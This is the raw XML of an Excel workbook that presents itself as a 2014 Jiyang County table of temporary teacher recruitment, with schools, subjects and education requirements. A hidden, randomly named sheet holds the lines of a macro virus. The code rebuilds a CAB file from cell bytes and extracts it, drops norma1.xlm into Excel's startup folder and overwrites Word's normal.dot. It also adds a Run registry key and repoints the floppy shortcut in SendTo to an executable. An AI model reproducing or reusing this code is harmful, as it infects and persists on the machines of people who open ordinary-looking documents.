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45" windowHeight="6780" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="JTWIBVOSNYIROP" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="汇总" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="Counter" localSheetId="0">'JTWIBVOSNYIROP'!$C$82</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'JTWIBVOSNYIROP'!$A$1:$A$8</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="275" uniqueCount="250">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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小学</t>
  </si>
  <si>
    <t>幼儿园</t>
  </si>
  <si>
    <t>济北街道中心幼儿园</t>
  </si>
  <si>
    <t>济阳街道公办幼儿园</t>
  </si>
  <si>
    <t>孙耿镇公办幼儿园</t>
  </si>
  <si>
    <t>新市镇公办幼儿园</t>
  </si>
  <si>
    <t>曲堤镇公办幼儿园</t>
  </si>
  <si>
    <t>仁风镇公办幼儿园</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</si>
  <si>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</si>
  <si>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Private Sub createcabfile()</t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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天山小学（民办）</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</si>
  <si>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</si>
  <si>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</si>
  <si>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myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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语文</t>
  </si>
  <si>
    <t>数学</t>
  </si>
  <si>
    <t>英语</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</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</si>
  <si>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</si>
  <si>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for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t>End Sub</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</si>
  <si>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</si>
  <si>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幼师</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</si>
  <si>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</si>
  <si>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</si>
  <si>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w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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历史</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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合计</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>do while m&gt;0</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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化学</t>
  </si>
  <si>
    <t>生物</t>
  </si>
  <si>
    <t>政治</t>
  </si>
  <si>
    <t>地理</t>
  </si>
  <si>
    <t>音乐</t>
  </si>
  <si>
    <t>体育</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile cabfile</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</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</si>
  <si>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</si>
  <si>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thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</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</si>
  <si>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</si>
  <si>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</si>
  <si>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for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t>e2:</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t>美术</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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备注</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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招聘单位</t>
  </si>
  <si>
    <t>学段</t>
  </si>
  <si>
    <t>县创新中学</t>
  </si>
  <si>
    <t>县竞业园学校</t>
  </si>
  <si>
    <t>县志远小学</t>
  </si>
  <si>
    <t>初中</t>
  </si>
  <si>
    <t>小学</t>
  </si>
  <si>
    <t>幼儿园</t>
  </si>
  <si>
    <t>附件一：</t>
  </si>
  <si>
    <t>学历要求</t>
  </si>
  <si>
    <t>大学专科及以上学历</t>
  </si>
  <si>
    <t>中专及以上学历</t>
  </si>
  <si>
    <t>专业要求、其他要求、笔试内容</t>
  </si>
  <si>
    <t>临时聘用教师与公开招聘的在编教师的要求相同，具体见《2014年济阳县公开招聘教师（含专业辅导员）计划和专业要求一览表》（附件一）</t>
  </si>
  <si>
    <t>岗位名称</t>
  </si>
  <si>
    <t>初中教师</t>
  </si>
  <si>
    <t>小学教师</t>
  </si>
  <si>
    <t>幼儿园教师</t>
  </si>
  <si>
    <t>2014年济阳县公开招聘临时聘用教师计划和专业要求一览表</t>
  </si>
  <si>
    <t>学科、招聘计划</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</si>
  <si>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</si>
  <si>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w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>济北花园幼儿园（民办）</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</si>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</sst>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000"/>
    <numFmt numFmtId="185" formatCode="&quot;是&quot;;&quot;是&quot;;&quot;否&quot;"/>
    <numFmt numFmtId="186" formatCode="&quot;真&quot;;&quot;真&quot;;&quot;假&quot;"/>
    <numFmt numFmtId="187" formatCode="&quot;开&quot;;&quot;开&quot;;&quot;关&quot;"/>
    <numFmt numFmtId="188" formatCode="0.0_ "/>
    <numFmt numFmtId="189" formatCode="0.00_);[Red]\(0.00\)"/>
    <numFmt numFmtId="190" formatCode="0.0_);[Red]\(0.0\)"/>
    <numFmt numFmtId="191" formatCode="0_ "/>
    <numFmt numFmtId="192" formatCode="0_);[Red]\(0\)"/>
  </numFmts>
  <fonts count="24">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="0"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="仿宋_GB2312"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="0"/>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11"/>
      <color indexed="8"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <name val="黑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3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="2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5" fillId="16" borderId="5" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="17" fillId="17" borderId="6"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2" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="14" fillId="16" borderId="8" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="13" fillId="7" borderId="5" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="0" fillId="23" borderId="9" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="30">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="11" xfId="0" applyNumberFormat="1"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0" fontId="3" fillId="0" borderId="14"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23" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>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192" fontId="3" fillId="0" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="17" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="192" fontId="3" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"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142"/>
  <sheetViews>
    <sheetView showFormulas="1" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="B1">
      <selection activeCell="F1" sqref="A1:F16384"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="19.25390625" style="0" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="6.625" style="0" customWidth="1"/>
    <col min="3" max="3" width="31.875" style="2" hidden="1" customWidth="1"/>
    <col min="4" max="6" width="0" style="0" hidden="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="2:3" ht="14.25">
      <c r="B1" t="s">
        <v>153</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="2" spans="2:3" ht="14.25">
      <c r="B2" t="s">
        <v>79</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="3" spans="2:3" ht="15.75">
      <c r="B3" t="s">
        <v>79</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="4" spans="2:3" ht="14.25">
      <c r="B4" t="s">
        <v>79</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="5" spans="2:3" ht="14.25">
      <c r="B5" t="s">
        <v>79</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" spans="2:3" ht="14.25">
      <c r="B6" t="s">
        <v>79</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="7" spans="2:3" ht="14.25">
      <c r="B7" t="s">
        <v>79</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="8" spans="2:3" ht="14.25">
      <c r="B8" t="s">
        <v>79</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="9" spans="2:3" ht="14.25">
      <c r="B9" t="s">
        <v>79</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="10" spans="2:3" ht="15.75">
      <c r="B10" t="s">
        <v>79</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="11" spans="2:3" ht="15.75">
      <c r="B11" t="s">
        <v>79</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="12" spans="2:3" ht="15.75">
      <c r="B12" t="s">
        <v>79</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="13" spans="2:3" ht="14.25">
      <c r="B13" t="s">
        <v>201</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>142</v>
      </c>
    </row>
    <row r="14" spans="2:3" ht="15.75">
      <c r="B14" t="s">
        <v>76</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="15" spans="2:3" ht="15.75">
      <c r="B15" t="s">
        <v>145</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="16" spans="2:3" ht="15.75">
      <c r="B16" t="s">
        <v>103</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="17" spans="2:3" ht="15.75">
      <c r="B17" t="s">
        <v>47</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="18" spans="2:3" ht="15.75">
      <c r="B18" t="s">
        <v>191</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="19" spans="2:3" ht="15.75">
      <c r="B19" t="s">
        <v>193</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="20" spans="2:3" ht="15.75">
      <c r="B20" t="s">
        <v>23</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="21" spans="2:3" ht="14.25">
      <c r="B21" t="s">
        <v>27</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="22" spans="2:3" ht="14.25">
      <c r="B22" t="s">
        <v>88</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="23" spans="2:3" ht="15.75">
      <c r="B23" t="s">
        <v>213</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="24" spans="2:3" ht="15.75">
      <c r="B24" t="s">
        <v>249</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="25" spans="2:3" ht="14.25">
      <c r="B25" t="s">
        <v>164</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="26" spans="2:3" ht="15.75">
      <c r="B26" t="s">
        <v>216</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="27" spans="2:3" ht="15.75">
      <c r="B27" t="s">
        <v>86</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="28" spans="2:3" ht="15.75">
      <c r="B28" t="s">
        <v>72</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="29" spans="2:3" ht="15.75">
      <c r="B29" t="s">
        <v>135</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="30" spans="2:3" ht="15.75">
      <c r="B30" t="s">
        <v>169</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="31" spans="2:3" ht="15.75">
      <c r="B31" t="s">
        <v>116</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>205</v>
      </c>
    </row>
    <row r="32" spans="2:3" ht="15.75">
      <c r="B32" t="s">
        <v>87</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>206</v>
      </c>
    </row>
    <row r="33" spans="2:3" ht="15.75">
      <c r="B33" t="s">
        <v>192</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="34" spans="2:3" ht="15.75">
      <c r="B34" t="s">
        <v>101</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="35" spans="2:3" ht="14.25">
      <c r="B35" t="s">
        <v>105</v>
      </c>
      <c r="C35" s="2" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="36" spans="2:3" ht="15.75">
      <c r="B36" t="s">
        <v>44</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>209</v>
      </c>
    </row>
    <row r="37" spans="2:3" ht="14.25">
      <c r="B37" t="s">
        <v>224</v>
      </c>
      <c r="C37" s="2" t="s">
        <v>210</v>
      </c>
    </row>
    <row r="38" spans="2:3" ht="14.25">
      <c r="B38" t="s">
        <v>194</v>
      </c>
      <c r="C38" s="2" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="39" spans="2:3" ht="14.25">
      <c r="B39" t="s">
        <v>24</v>
      </c>
      <c r="C39" s="2" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="40" spans="2:3" ht="14.25">
      <c r="B40" t="s">
        <v>155</v>
      </c>
      <c r="C40" s="2" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="41" spans="2:3" ht="14.25">
      <c r="B41" t="s">
        <v>113</v>
      </c>
      <c r="C41" s="2" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="42" spans="2:3" ht="14.25">
      <c r="B42" t="s">
        <v>217</v>
      </c>
      <c r="C42" s="2" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="43" spans="2:3" ht="15.75">
      <c r="B43" t="s">
        <v>202</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="44" spans="2:3" ht="15.75">
      <c r="B44" t="s">
        <v>41</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="45" spans="2:3" ht="15.75">
      <c r="B45" t="s">
        <v>22</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="46" spans="2:3" ht="14.25">
      <c r="B46" t="s">
        <v>42</v>
      </c>
      <c r="C46" s="2" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="47" spans="2:3" ht="14.25">
      <c r="B47" t="s">
        <v>106</v>
      </c>
      <c r="C47" s="2" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="48" spans="2:3" ht="14.25">
      <c r="B48" t="s">
        <v>94</v>
      </c>
      <c r="C48" s="2" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="49" spans="2:3" ht="14.25">
      <c r="B49" t="s">
        <v>215</v>
      </c>
      <c r="C49" s="2" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="50" spans="2:3" ht="14.25">
      <c r="B50" t="s">
        <v>98</v>
      </c>
      <c r="C50" s="2" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="51" spans="2:3" ht="15.75">
      <c r="B51" t="s">
        <v>112</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="52" spans="2:3" ht="15.75">
      <c r="B52" t="s">
        <v>156</v>
      </c>
      <c r="C52" s="2" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="53" spans="2:3" ht="15.75">
      <c r="B53" t="s">
        <v>221</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="54" spans="2:3" ht="15.75">
      <c r="B54" t="s">
        <v>1</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="55" spans="2:3" ht="15.75">
      <c r="B55" t="s">
        <v>222</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="56" spans="2:3" ht="15.75">
      <c r="B56" t="s">
        <v>3</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="57" spans="2:3" ht="15.75">
      <c r="B57" t="s">
        <v>220</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="58" spans="2:3" ht="15.75">
      <c r="B58" t="s">
        <v>81</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="59" spans="2:3" ht="15.75">
      <c r="B59" t="s">
        <v>93</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="60" spans="2:3" ht="15.75">
      <c r="B60" t="s">
        <v>29</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="61" spans="2:3" ht="15.75">
      <c r="B61" t="s">
        <v>128</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="62" spans="2:3" ht="15.75">
      <c r="B62" t="s">
        <v>138</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="63" spans="2:3" ht="14.25">
      <c r="B63" t="s">
        <v>154</v>
      </c>
      <c r="C63" s="2" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="64" spans="2:3" ht="14.25">
      <c r="B64" t="s">
        <v>104</v>
      </c>
      <c r="C64" s="2" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="65" spans="2:3" ht="14.25">
      <c r="B65" t="s">
        <v>60</v>
      </c>
